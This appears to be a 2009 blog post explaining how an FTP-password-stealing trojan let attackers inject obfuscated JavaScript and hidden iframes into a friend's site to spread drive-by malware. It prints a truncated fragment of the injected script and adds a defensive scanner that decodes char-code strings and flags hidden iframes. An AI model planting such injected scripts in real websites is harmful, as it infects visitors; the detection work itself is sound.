All Your iFRAMEs Point to Us

Author: seven February 11, 2009

Defacing a website is the lowest form of site hacking these days (please, don't deface us because of this statement :) ). Defacing usually means changing the hacked website's XHTML files on the server or in transit between the server and the client. A completely defaced website attracts attention for a limited amount of time, and the whole deal is quickly forgotten. However, defacing a site by silently injecting 1x1 iframes, JavaScript or a massive amount of links/subpages can be more lucrative for spammers (link building, visitor stat fraud, malware spread etc.), more horrifying to your business (you will lose visitors while you are blacklisted) and, worst of all, it can't be detected that easily.

I recently witnessed a pretty horrible deface. A pal of mine got infected with a trojan which sent the passwords stored in his FTP programs to an automated system, which automatically FTP'd to his sites, downloaded all files, changed the .html files by injecting tons of spam/porn/viagra links and hex JavaScript code for opening up iframes to malicious sites containing more trojans, and then reuploaded everything to my pal's innocent website. Every visitor to the once innocent website was attacked by drive-by downloads of trojans.
This was appended to all HTML files:

    var temp="",i,c=0,out="";
    var if_uniq_var="tf100";
    var start_time="29 Jan 2009 23:39:27";
    var str="60!105!102!11  ...  !97!109!101!62!";
    l=str.length;

All that JavaScript actually outputs only this (don't click on the link):

Drive-by downloads are caused by URLs that attempt to exploit their visitors and cause malware to be installed and run automatically. Google's analysis of billions of URLs over a 10-month period shows that over 3 million malicious URLs initiate drive-by downloads. Approximately 1.3% of all incoming search queries to Google's search engine returned at least one URL labeled as malicious in the results page (check out the Google Technical Report).

Matt Cutts (Google), in his Preventing Virtual Blight presentation, suggests doing some pretty basic stuff which almost anybody can apply, and I must admit that creating a Google alert for "Viagra" is pretty unique.
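A site owner can also check files for the pattern shown earlier without running any of it. The sketch below is an added example, not code from the original post: it statically decodes "60!105!102!..." style character-code strings and flags iframes that are 0/1 px or CSS-hidden. The function names, thresholds and the `malicious.example` sample are assumptions made for illustration.

```javascript
// Added example: static triage for the injection described above. Nothing is
// executed or fetched; suspicious strings are only decoded and inspected.

// 8+ decimal numbers (1-3 digits) joined by one repeated delimiter, e.g. "60!105!102!".
const CHARCODE_RUN = /\d{1,3}([^\w\s"'<>])(?:\d{1,3}\1){7,}(?:\d{1,3})?/g;

// Decode "60!105!..." into text without eval(); null if a value is not a byte.
function decodeRun(run, delim) {
  const codes = run.split(delim).filter(Boolean).map(Number);
  if (codes.some((n) => n > 255)) return null;
  return String.fromCharCode(...codes);
}

// Return the src of every iframe that is 0/1 px in either dimension or hidden via CSS.
function hiddenIframes(html) {
  const found = [];
  for (const [tag] of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const attr = (name) =>
      (tag.match(new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]+)`, "i")) || [])[1];
    const tiny = ["width", "height"].some((d) => parseInt(attr(d), 10) <= 1);
    const cssHidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    if (tiny || cssHidden) found.push(attr("src") || "(no src)");
  }
  return found;
}

// Scan one HTML document: plain hidden iframes plus iframes hidden in char-code strings.
function scanHtml(html) {
  const findings = hiddenIframes(html).map((src) => ({ kind: "hidden-iframe", src }));
  for (const m of html.matchAll(CHARCODE_RUN)) {
    const decoded = decodeRun(m[0], m[1]);
    if (!decoded || !/<\s*(iframe|script)\b/i.test(decoded)) continue;
    const srcs = hiddenIframes(decoded);
    findings.push({ kind: "encoded-markup", src: srcs[0] || "(see decoded)", decoded });
  }
  return findings;
}

// Constructed sample: a clean page with an appended script in the page's "N!N!N!" style.
const hidden = '<iframe src="http://malicious.example/x" width=1 height=1></iframe>';
const encoded = [...hidden].map((c) => c.charCodeAt(0)).join("!") + "!";
const samplePage = `<html><body><p>Hello</p></body></html>
<script>var temp="",i,c=0,out=""; var str="${encoded}"; l=str.length;</script>`;

console.log(scanHtml(samplePage));
```

Run it over a local copy of the site's files and compare hits against a known-good backup; a finding in every .html file at once is the signature of the automated FTP re-upload described above.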

CEO/CTO at Nivas®
Neven Jacmenović has been passionately involved with computers since the late 80s, the age of Atari and Commodore Amiga. As one of the internet industry pioneers in Croatia, since the 90s he has been involved in the making of many award-winning, innovative and successful online projects. He is an experienced full stack web developer, analyst and system engineer. In his spare time, Neven is transforming his retro-futuristic passion into various golang, Adobe Flash and JavaScript/WebGL projects.
